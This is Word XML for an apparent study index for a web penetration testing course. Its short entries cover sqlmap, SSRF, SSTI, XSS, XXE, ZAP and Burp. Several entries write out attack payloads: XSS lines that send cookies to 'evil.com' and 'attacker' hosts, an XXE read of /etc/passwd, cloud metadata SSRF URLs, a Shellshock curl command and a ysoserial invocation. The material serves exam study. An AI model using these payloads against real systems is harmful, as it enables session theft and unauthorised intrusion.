            <w:tr w:rsidR="00985AE1" w14:paraId="0F4068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2779EE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sqlmap – initial targeting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B3.122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21874A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-u=URL. --crawl=spider for entry points. --forms=target forms. --dbms=specify DB if known. -p=specific parameter</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2EA7C1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4FCF3F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sqlmap – overview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B3.120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72918C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Python-based. Open source. Actively maintained (use dev version). Integrates with Burp/ZAP/Metasploit/w3af. Supports all major DBs</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6BA6A7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4AD172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SSRF – Server-Side Request Forgery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B4.146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2F5F074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Server fetches attacker-supplied URL. Access internal resources, AWS metadata (169.254.169.254), cloud metadata. XXE can trigger SSRF</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7264AF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375A82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SSRF – AWS instance metadata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B4.150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3BFDBE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http://169.254.169.254/latest/meta-data/ (IMDSv1 only). GCP: metadata.google.internal. Azure: 169.254.169.254/metadata/instance. K8s: kubernetes.default</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="71D776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BB8EE6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SSRF – finding vulnerable params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B4.147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209E3EA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Look for params referencing URLs/paths: url=, path=, file=, redirect=, rate=. Test: replace with attacker URL or internal IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6C013C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1ECA55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SSTI – Server-Side Template Injection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B4.129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E8EEC0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Template engines: Jinja2(Python), Pug(Node), Twig(PHP), Freemarker(Java). PoC: {{7*7}}=49. Leads to RCE. LFI possible</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1BD543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6744B6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SSTI – detection probes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B4.132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67E06B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{{7*7}}=49 (Jinja2/Twig), #{7*7}=49 (Pug/Ruby), ${7*7}=49 (Freemarker). Engine-specific syntax. Escalate to RCE after PoC</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2C6F31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F857A2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Stored XSS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B4.59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EAB4B2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Payload stored in DB. Renders for ALL users who view infected content. One injection→thousands of victims. Best XSS for impact</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6FE7FB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40C8BC2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T</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="01F34F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1A4EF0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Target Profiling – web server components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B1.133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F7260A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Web Server(Apache/IIS/Nginx), Framework(Spring/ASP.NET/Django/Symfony), CMS(WordPress/Drupal/Joomla/SharePoint), DB(MySQL/MSSQL/Oracle/PostgreSQL)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5AF017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E39B64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Template Engines overview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B4.127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7127A7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Static content+variable data=dynamic pages. Jinja2, Pug, Twig, Freemarker, Thymeleaf, Velocity. Combine HTML+data</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="07DF59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7D173A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Threat Modeling (NIST 800-30)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94F724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Brainstorm vulns→threats→mitigations. Early in SDLC. Attacker's perspective. Flexible. Disadvantage: newer technique</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1054E2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E8A581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Timing Attacks / Side-Channel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B2.112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C61D5D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Good user = hash runs before error reply→SLOWER. Bad user = immediate error reply→FASTER. Timing diff = username enum</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="21C6E2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37BB93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TLS Handshake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B1.143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C7C25E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(1)Client hello (TLS versions). (2)Server hello+cert. (3)Client verifies cert. (4)Key exchange. (5)Session keys. (6)Encrypted data. RSA vs DH key exchange</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7C68AD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65FED61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U</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="648CA8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6D937C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UNION SELECT – prerequisites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B3.80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63D9BB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Column count must MATCH original query. Data types must be compatible. At least one string column needed. ORDER BY used first to find count</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1CA88F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330013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Username Harvesting techniques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B2.109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3AA707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Different error messages (Username invalid vs Password invalid). Different response sizes. Form repeats good username. Response timing. Burp Comparer</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1B6E5B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099104B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V</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="77CBFE7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3B4B15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Virtual Host Discovery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B1.106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6034DC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HTTP/1.1 Host header enables virtual hosting. Find via: DNS zone transfer/brute-force/PTR, HTTPS cert SANs, crt.sh, OSINT</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="13E13C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67ED40F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W</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="57597D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2CEC0B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wget – spidering + proxy routing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B1.160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0C4576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wget -r -P /tmp --no-check-certificate https://target. Proxy: export https_proxy=https://127.0.0.1:8080. By default: IGNORES robots.txt. Override: -e robots=off</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="55F6BA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F319AF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WSTG – Information Gathering IDs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B1.103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D12669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INFO-01:Fingerprint Server, INFO-02:Metafiles, INFO-03:Enumerate Apps, INFO-04:Webpage Content Leakage, INFO-05:Entry Points, INFO-06:Execution Paths, INFO-07:Framework, INFO-08:Web App, INFO-09:Architecture</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4338DF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56CCFA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WSTG – Logic Flaws IDs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A686D6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BUSL-01:Data Validation, BUSL-02:Forge Requests, BUSL-03:Integrity Checks, BUSL-04:Process Timing, BUSL-05:Function Use Limits, BUSL-06:Workflow Circumvention, BUSL-07:Mis-use, BUSL-08:Unexpected File Upload</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="600C39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7D00F1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WSTG – Session Management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B2.119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3E0BF0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SESS-01:Schema Test, SESS-02:Cookies, SESS-03:Session Fixation, SESS-04:Exposed Variables, SESS-05:CSRF, SESS-06:Logout, SESS-07:Timeout, SESS-08:Token randomness, SESS-09:Hijacking</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0F1D05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50029BB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X</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="342026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770FA7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X-Frame-Options header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B1.101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445C84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Prevents iframe rendering. Anti-Clickjacking. Values: DENY (no framing), SAMEORIGIN (same origin only). Google=DENY. Facebook=allows framing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="782024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06C222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XMLHttpRequest (XHR)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B4.106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F66719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readyState: 0=UNSENT, 1=OPENED, 2=SENT (HTTP request issued!), 3=LOADING, 4=DONE. Exam: readyState 2 = request issued over network</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4DA406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435F3C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XSS – Classes overview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B4.47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24D655B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Reflected(URL-based, non-persistent), Stored(DB-based, persistent, best impact), DOM-based(client-side, never hits server)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7FE59D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8A6E4A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XSS – cookie theft (no HttpOnly)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B4.39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59FD61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&lt;script&gt;img=new Image();img.src='//evil.com/c.php?='+document.cookie;&lt;/script&gt;. HTTPS target preferred. HttpOnly prevents this</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="451F4B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6C6F45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XSS – discovery / probing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B4.75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99931F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Uniquely crafted string first (not special chars). Then fuzz special chars. Check every input. URL params, POST, headers, cookies. Stored=check ALL output locations</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="499484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CA97E8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XSS – filter bypass techniques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B4.82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D67FE5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Event handlers: onerror, onload, onmouseover. Encoding: %3C, &amp;#60;, \u003C. Mixed case: JaVaScRiPt:. Nested: &lt;&lt;script&gt;script&gt;. Comment: /**/</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="65E346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1AFE8A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XSS – Fuzzing payloads (XSScrapy)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B4.76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47E21C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XSScrapy payloads: "Q=&lt;x&gt;, "O80;, JaVAscRIPT:prompt(99). These are the XSScrapy-specific injection strings (NOT &lt;script&gt;alert(42)&gt;)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7B5DA3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B197F2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XSS – session theft without redirect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B4.39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C30E8B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Use Image() object instead of window.location. Silent theft. img.src = '//attacker/log?c='+document.cookie. No page redirect</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="37FCA4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255733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XXE – attack structure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B3.39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3329EA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&lt;!DOCTYPE doc [&lt;!ENTITY xxe SYSTEM 'file:///etc/passwd'&gt;]&gt;&lt;root&gt;&amp;xxe;&lt;/root&gt;. Line 6=defines entity, Line 9=expands entity (results shown here). ENTITY keyword crucial</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="385B66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24E71D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XXE – type of attack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B3.39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672ACC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Injection class (like SQL, command injection). Language=XML. Exploits XML parser. No input sanitization. WSTG-INPV-07</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="188B7D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58285E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XXE – via SSRF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B4.149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B57F62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XXE can trigger SSRF: SYSTEM 'http://169.254.169.254/latest/meta-data/'. External DTD for blind XXE. Collaborator for OOB exfil</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="524792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A6510F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lastRenderedPageBreak/>
                    <w:t xml:space="preserve">  Y</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6A6C20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EC314B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ysoserial – Java deserialization tool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B5.49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CFDA9E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Generates exploit serialized objects. CommonsCollections, Spring, Hibernate gadget chains. java -jar ysoserial.jar CommonsCollections1 'id'</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="26FDAF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5132DAB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Z</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="31E71B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D52938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ZAP – Add-ons / extensions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B1.46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13F17A2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GraphQL Support, Replacer, Retire.js, OpenAPI Support, Authentication Helper. Marketplace plug-ins. Test new ones before trusting</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0861AB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A1FA35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ZAP – AJAX Spider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B1.161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AC8E76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Required for AJAX-heavy sites. Attack→AJAX Spider. Dynamic JS-built links. Alternative to traditional spider. Use both</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4C802D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5EC667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ZAP – Attack Menu features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B1.45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922F0E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Active scan, Forced browsing (DirBuster), Spider+AJAX Spider, Fuzzing. Passive scanner=always running (no config)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2305D1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C63220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ZAP – Encode/Decode/Hash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B4.56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21D244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Tools→Encode/Decode/Hash. URL encode/decode, Base64, HTML entities, SHA hashes. Similar to Burp Decoder</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="06C1D1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14D56D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ZAP – Forced Browse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B2.51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F08917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DirBuster-style wordlist attack. Attack→Forced Browse Site. Uses wordlists to discover unlinked content</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6C3E65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48885D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ZAP – Generate Anti-CSRF Test Form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48277E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Right-click POST→Generate Anti-CSRF Test FORM. Automates CSRF PoC for POST requests. Click Submit to test</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0AB857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0C053D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ZAP – Import (API/URL/Postman)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B1.47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D5E6E3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Import: WSDL, OpenAPI/Swagger, URL lists, log files, GraphQL schemas, Postman Collections, PCAP, HAR files</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0429FD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D0A698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ZAP – Overview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B1.43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37FAD5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Free, open-source. Linux Foundation/Software Security Project since Aug 2023 (was OWASP). Passive scanner always on. HTTP/2 support</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4D3353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9EE42E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ZAP – Spider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B1.160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2489955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Seed by proxying. Right-click site→Attack→Spider. 'Show Advanced Options'. Content appears in Sites tab</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="56FED8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451F924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ZAP – Tools menu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B1.48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73AD4B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Encode/Decode/Hash, Manual Request Editor, Authentication Tester, Replacer, Browse API, Toggle Break, WebSocket Editor</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7C673A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9BEE22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Zero-Knowledge vs Full-Knowledge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B1.22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AF74D8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Zero-K=only URL known, expensive, NOT more 'real-world'. Full-K=source code, arch, devs available. Shift toward full-knowledge</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="107356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1F47617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</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="19CB871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3BD891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Bruno – API client (Postman replacement)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B4.142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940E63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Open-source. Stores collections LOCALLY (Postman moved to cloud-only). Uses .bru plain markup language. Supports environments + npm packages. https://usebruno.com. Seed to Burp for testing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="78FBCD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00989E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G</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3F9C5D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EFB90B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GraphQL – ZAP support (add-on)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B1.48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3EB941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ZAP Add-ons: GraphQL Support (built-in extension). Import: File→Import a GraphQL Schema. ZAP can import GraphQL schemas for API testing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3CD818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CB8946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GraphQL – ZAP Import Schema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B1.49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0223F0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File→Import→Import a GraphQL Schema. Discovers endpoints. Also: ZAP can import OpenAPI/WSDL/Postman/URL lists/HAR/PCAP. Saves time over manual content discovery</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1F5983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93E36F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GraphQL – attacks / injection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B3.68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2CF8CC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GraphQL endpoints typically at /graphql or /api/graphql. Introspection query reveals full schema: {__schema{types{name}}}. Inject in query/mutation params. Same injection vulns as REST. Fuzz all input fields</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="54AAC4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48287F5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A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="15FB5D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6316DC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AJAX – XHR .status property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B4.110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14CAFA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.status = HTTP status code of response (e.g., 200=OK, 401=Unauthorized). Use with readyState===4 (DONE). onreadystatechange fires on each state change. .responseText = body as string. .response = body (type per responseType)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="250C10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72CBAB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AJAX – XHR readyState values (full)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B4.109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A0320B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0=UNSENT (open() not called), 1=OPENED (open() called, URL+method set), 2=SENT (send() called, HTTP request issued over network, headers+status available), 3=LOADING (downloading/processing), 4=DONE (complete). Exam: readyState 2 = request issued</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7D73C1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ADA872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AJAX – withCredentials property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B4.110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0C7EF46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XHR.withCredentials=true → browser appends cookies/auth headers to cross-origin requests. Without it: cross-origin requests sent WITHOUT cookies. Critical for CSRF via AJAX</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3AFD4C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CD7202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AJAX – Penetration Testing approach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B4.115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3F8CDD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All vuln categories apply. Biggest issue=MAPPING (one-page apps build links via JS). Burp+ZAP AJAX Spider help but not perfect. Best: click every link in browser through proxy. Exploitation=same as standard apps</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="67EABF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226DC35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W</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="79DB99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3D3096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Web Service / API Testing Methodology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B4.144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21D51E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Methodology same as web apps. Challenge=SEEDING requests into interception proxy. Steps: (1) Import API schema/collection into Postman/Bruno/SoapUI, (2) Issue requests to seed Burp/ZAP, (3) Test all params/headers like standard web app. Works for mobile apps too</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4A9599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8AEF93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WSTG – Pre-engagement / Scope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B5.107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6B9B944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Permission (signed letter/SOW by C-level), Scope (IPs/URLs/exclusions—third parties need notification), Rules of Engagement (source IPs, UA), Test accounts (2 per role), Backups (ideally test env), Communication plan (stakeholders, frequency, severity thresholds for immediate notification)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1769A9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681F64C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C</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="74AA92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4BA19F2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curl – command-line HTTP tool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B1.96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262D5A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curl -v URL (verbose). curl -I URL (HEAD only). curl -X POST -d 'data' URL. curl -H 'Header: val'. curl -k (ignore SSL). curl -b 'cookie=val'. curl -A 'User-Agent'. Used for quick request crafting, Shellshock: curl -A '() { 42;}; echo; id' http://target/cgi-bin/script</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="071FB5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4EC2180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P</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0DD52D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682F93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Python 2 vs Python 3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B5.58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99FADA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Python 2.x = legacy (final release 2.7 in 2010, now EOL). Python 3 = present+future. Exam scripts may be Python 2 or 3. print() vs print. raw_input() vs input(). division behavior differs. Prefer Python 3 for new tools</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="79F644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463853D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A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="15700C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7AF3FC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Authentication – Built-in Schemes (401+WWW-Authenticate)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B2.59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92E048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Server replies 401 Unauthorized + WWW-Authenticate header to require auth. WWW-Authenticate defines scheme (Basic, Digest, NTLM, Negotiate). Browser handles built-in schemes automatically. Client sends Authorization header with credentials</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2D25C7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696AEB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Authentication – Bearer / Token Auth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B2.100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DB96A0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RFC6750. 'Give access to the bearer of this token'. Authorization: Bearer &lt;token&gt;. Token=JWT usually. Sent in Authorization header. Used with OAuth2. Exam: Bearer = token authentication scheme</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3EC647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1D50C5F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S</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="26C5A6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7BA859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Slow Hashing – bcrypt/PBKDF2 (password protection)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B2.115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9A47FC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Fast hashes (MD5/SHA1/SHA2)=designed for speed=bad for passwords. Slow hashes (bcrypt, PBKDF2, scrypt, Argon2)=intentionally slow=good for passwords. Practical impact: bcrypt on valid user causes measurable timing delay vs bad username → enables username enumeration!</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3D07D4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793DCE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 – Keywords reference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B3.51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E8E1D5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SELECT (retrieve). FROM (table). WHERE (filter). UNION (combine results, equal col count+types). INSERT INTO (add row). UPDATE SET (modify). DELETE FROM (remove). DROP TABLE (destroy). ORDER BY N (sort, used for column count). HAVING (filter aggregate). GROUP BY</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="51943F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707848F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D</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0460D5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F5FFF3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Data Attacks – JSON parsing and eval() danger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B4.123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0CF1B8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Modern apps push logic to client. JSON = JavaScript Object Notation (valid JS!). DANGER: parsing JSON with eval() = code execution risk. Use JSON.parse() instead. If JSON parsed server-side: all injection attacks apply. Burp + sqlmap both parse JSON automatically</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="36A36B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1D8469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lastRenderedPageBreak/>
                    <w:t>Data Formats – XML vs JSON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B4.124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119677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XML=old standard, verbose, SOAP uses it. JSON=REST APIs, lightweight, human-readable. JSON is valid JS code (eval() risk). Test both formats. Tools (Burp, sqlmap) support JSON and XML natively. Content-Type: application/json vs application/xml</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="308CEE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66089A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</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6DF266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29995A5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Scanner – Passive scanning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B2.32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B2C4F7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Always running in background. Simply interact with target while Burp proxies. Identifies: cookies without HttpOnly/Secure, info disclosure, mixed content. No attack payloads sent. FREE intelligence gathering. Pro version only</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="079C61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7651BF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Scanner – Active scanning modes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B2.33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CEEFE3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Push-button: New Scan button → choose target. Live scanning: active scan while browsing (laziest option). Dynamic scan=crawls+audits. Static scan=audits only. Pro version only. Check Dashboard for results. Confidence: Certain/Firm/Tentative</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3AB2F0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155EB25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Scanner – Config library + Add to Task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B2.39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CEC277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Config library: predefined scan configs (Light, Medium, Heavy). Add to Task: discovered new path after scan started→right-click→Add to scope task. Parallelization: multiple concurrent scans. Results: Dashboard→Issue Activity. Confidence levels: Certain/Firm/Tentative</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="02CA13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DB1D04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Scanner – Retest and Verification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B2.45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298F8AB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After client remediates: right-click issue→Send to scanner. 'Confirm issue' re-scans specific path+payload. Confidence levels show certainty of finding. Export: Issues report from Burp Scanner. Manual verification always recommended for critical findings</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0362BD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1D593C1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A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="42F7AB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E0DFB5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Application Infrastructure (web server tiers)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B1.132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96F6EB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Typical tiers: Web Server (Apache/IIS/Nginx)→Application Server (Tomcat/IIS/mod_php)→Database Server (MySQL/MSSQL/Oracle). DMZ placement. Reverse proxies. Load balancers may alter headers. Understand architecture before testing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="05F3D0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287271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J</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="174CC1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59010C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JavaScript Frameworks (jQuery/Angular/React) + Retire.js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B4.119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32E1B0E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Identification: look for included JS files at page top. jQuery, AngularJS, ReactJS, Bootstrap most common. Often minimized/obfuscated. Check for known vulnerabilities. Retire.js Burp extension: passively identifies old/vulnerable frameworks. Reports in Dashboard</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="35074B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7697B4F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X</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5D946D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3F6442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XSS – document/window properties for exploitation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B4.36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9A1C1C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document.cookie = read all cookies (blocked if HttpOnly). document.domain = confirm application context (use in PoC). window.location = redirect browser. document.forms = access form fields + hidden values. document.referrer = referring URL. window.history = navigation history</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="51D7920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224BD28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P</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0CCD1BA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609F75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Pentest Communication Plans (full)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B5.112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763053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Include: stakeholder list (owners, execs, IT, devs, security). Frequency+dates of status meetings. Severity threshold for IMMEDIATE notification (usually Critical/High). Acceptable comms for sensitive findings (secure drop, encrypted email). Debrief schedule (multiple audiences possible). Pre-define emergency contact for critical findings during test</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="33D73A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3AAA05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</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="21A0F5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2D9C60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Burp – Platform Authentication config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B2.70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78EF02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Options→Network→Connections for Basic+NTLM auth. Burp performs auth on behalf of tools (Intruder, Scanner). Required when testing apps with HTTP built-in authentication. Needed for sqlmap --proxy with authenticated Burp session</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0E422C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6EF1D4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A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1351DF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BBB3E9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Assetnote Wordlists (B2.53)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B2.53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95D820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Context-specific wordlists from observed internet data. Better than generic lists. Technology-specific: PHP, .Net, CGI. Use with ffuf, gobuster, Kiterunner. Better wordlist = better content discovery</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="04C40D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46E971E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S</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="20DA44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70358CE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sqlmap – Riding ZAP/Burp Sessions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B3.125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16B6A4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ZAP: Tools→Options→Network→Connection→'Global HTTP State' (not default). Burp: Project Options→Sessions→Session Handling Rules. Configure proxy to TRANSFORM sqlmap requests passing through. --proxy alone does NOT auto-inherit auth sessions</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4855BB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70780B4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X</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="14D22E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C03F83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XSS vs CSRF – the key difference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B5.6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F56825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XSS uses a script (JS). CSRF uses STATIC content (no JS needed). CSRF confusingly also called XSRF. Both: victim's browser submits attacker-crafted request. XSS: attacker's code runs in victim's browser context. CSRF: victim's cookies sent automatically with forged request</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="798329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5E518C6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H</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0A70BD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7ED186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– PUT/DELETE/PATCH (CRUD mapping)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B1.87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DCE326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REST CRUD: Create=POST/PUT, Read=GET, Update=PUT/PATCH, Delete=DELETE. PUT: MAY allow file upload to webroot = critical finding. DELETE: removes resources. PATCH: partial update. Test these on every assessment. PUT /shell.php = potential RCE</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
